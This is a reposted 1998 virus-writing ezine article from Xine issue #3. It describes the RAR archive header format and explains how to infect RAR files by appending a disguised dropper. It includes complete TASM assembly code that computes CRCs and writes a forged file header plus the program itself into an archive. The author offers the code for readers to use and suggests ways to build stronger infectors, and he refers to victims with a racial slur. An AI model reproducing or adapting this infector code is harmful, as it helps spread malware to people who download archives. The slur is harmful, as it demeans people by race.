Copy Link
Add to Bookmark
Report

Xine - issue #3 - Phile 110

eZine's profile picture
Published in 
Xine
 · 7 months ago

 
/-----------------------------\
| Xine - issue #3 - Phile 110 |
\-----------------------------/



Dropping over RAR archives
From the Archives infector series
by UnknowN Mnemonik(alias StarZer0 on irc)/iKx

Intro
+-----+

rar is very common in the warez world , aproximately 75% of warez are
archived with rar , rar are quite easy infect , they don't need complex
manipulation and can be easily infected with 100 bytes of code , good
news no ? Ok let's infect them


The rar files structure
+-----------------------+

The header is small and it is the only one thing that need to be changed,
lets see how it's built , like in arj he have a header CRC , but no probs
virus coder destroy all protections once more .

There's no header signature ( bizarre mmm ? )


Name Type Value

OFFSET LABEL TYP VALUE DESCRIPTION
------ ----------- ---- ----------- ----------------------------------

00 HEAD_CRC DW 0000 Low part of the CRC header
02 HEAD_TYPE DB 00 Block type

Value: 72h = Marker block 73h = Archive header
74h = File header 75h = Comment header
76h = extra information 77h = subblock
78h = recovery record

03 HEAD_FLAGS DW 0000 Block size

Value: 4000h = old archive type , Ignored by older version
8000h = if set, ADD_SIZE field is present

05 (ADDSIZE) DW 0000 Optional - added block if file block

07 RARCOMPSS HEX 00000000 Compressed size
0B RARUNCMPS HEX 00000000 Uncompressed size
0F HOSTOS DB 00 Host operating system

Value: 0 = MS DOS 2 - WIN32
1 = OS/2 3 - UNIX

10 CRC32 HEX 00000000 CRC32 of the original file
14 FILETIME DW 0000 File time , msdos format
16 FILEDATE DW 0000 File date , msdos format
18 VERNEED DB 0 Version need to extract
19 METHODCMP DB 0 Compression method

Value: 0x30 - storing 0x33 - normal compression
0x31 - fastest compression 0x34 - good compression
0x32 - fast compression 0x35 - best compression

1A NAMELENGTH DB 0 File name length
1B ATTRIB DW 0 Rar attribute
1D FILENAME DS ? Filename

Infection
+----------+

I use the worst method for infection : THE DROPPER, it uses the stupidity
of some niggas under dos ( like a lot of poeple ) who see a .com and want
run it , this little com file is saying : Hey man , I'm here !!! run me,
run me, I have a suprise for you ( hehehe ) ,this method is also the best
to call niggas with their debugger to disassemble it , anyway , it's the
more easy way of infection , waiting for progression

Algorithm
+-----------+

1ø Open the file
2ø Go to the end
3ø Calculate the Crc32 of the virus
4ø Calculate the Crc of the header
5ø Write the header
6ø Write the virus

Usefull code
+--------------+

To prove that it does WORK, I have included here some usefull code you can
use and analyse , anyway , rar infection is too easy , test this with RAR
2.0 or upper and a TEST.RAR present in the same directory of the program,
compile the code with TASM/TLINK

--------------------------------------------------------------------------

.286
.model tiny
.code

start:

mov ax,3d02h ; open the file
mov dx,offset filename ; change name with you RAR
int 21h ; file

xchg ax,bx ; phucky handle bug

mov ax,4202h ; go to the end
xor cx,cx
xor dx,dx
int 21h

mov cx,fin-start
mov si,offset start

call crc_calc ; get the CRC of this prog

mov word ptr [RarCrc32],cx ; save it into RarCRC32
mov word ptr [RarCrc32+2],dx

mov cx,FinRarHeader-Rartype ; Get the Crc of the
mov si,offset RarType ; header

call crc_calc

mov word ptr [RarHeaderCrc],cx ; save low word in
; RarHeaderCrc

mov ah,40h ; write the header!
mov cx,FinRarHeader-RarHeader
mov dx,offset RarHeader
int 21h

mov word ptr [RarCrc32],0 ; clean all the RARCRC32
mov word ptr [RarCrc32+2],0
mov word ptr [RarHeaderCrc],0

mov ah,40h ; write this code
mov cx,Fin-start
mov dx,offset Start
int 21h

mov ah,3eh ; it's finish close the
int 21h ; file

ret

crc_calc:

push bx
push si cx

call crc_table ; render crc table

pop cx si

mov bp,cx

mov cx,0ffffh
mov dx,0ffffh

xor ax,ax

Crc_loop:

lodsb
mov bx,ax
xor bl,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,bh
shl bx,1
shl bx,1
xor cx,word ptr [bx+di]
xor dx,word ptr [bx+di+02]
dec bp

jnz Crc_loop

not dx
not cx

pop bx
ret

crc_table:

mov di,offset starttable+1024 ; the buffer table
; remember : It begin by the end
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On

TableHighloop: ; the major loop in the Crc table
; Calc

mov cx,8 ; set the minus loop to 8
mov dx,bp ; dx = bp , major counter loop
xor ax,ax ; ax = zero

TableLowLoop:

shr ax,1 ; mov one byte of ax at right in
; bin
rcr dx,1 ; if anything losted , put it on
; dx

jae anomality ; if superior or equal skip
; encrypt.

xor dx,08320h ; encrypt value by a signature
xor ax,0EDB8h ;

anomality:

loop TableLowLoop ; make it 8 times

stosw ; write ax
xchg dx,ax
stosw ; not write dx
dec bp ; decrement the counter

jnz TableHighLoop ; repeat it until bp = 0

mov word ptr [di],0 ; last value equal 0
sub di,2
mov word ptr [di],0
cld ; clear direction flag

ret

filename: db 'test.rar',0

RarHeader:

RarHeaderCrc: db 34h, 0efh
RarType: db 074h
RarFlags: dw 8000h
RarHeadsize: dw FinRarHeader-RarHeader
RarCompressed: dd Fin-Start
RarOriginal: dd Fin-Start
RarOs: db 0
RarCrc32: db 4 dup (0)
RarFileTime: db 063h, 078h ; random...
RarFileDate: db 031h, 024h
RarNeedVer: db 014h
RarMethod: db 030h
RarFnameSize: dw FinRarHeader-RarName
RarAttrib: dd 0

RarName: db 'TEST.COM'

FinRarHeader:

fin:

starttable: db 1024 dup (?)

end start

-----------------------------------------------------------------------------

Wanna build a good RAR infector ? Errrm as usual , a VXD is the best thing
to do , otherwise , there are minor things to upgrade , RAR infection is
easy as com infector , try also to use an existing header in a real RAR
file


Les petits D‚linquants (R)(C)(TM) [StarZero'98]

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT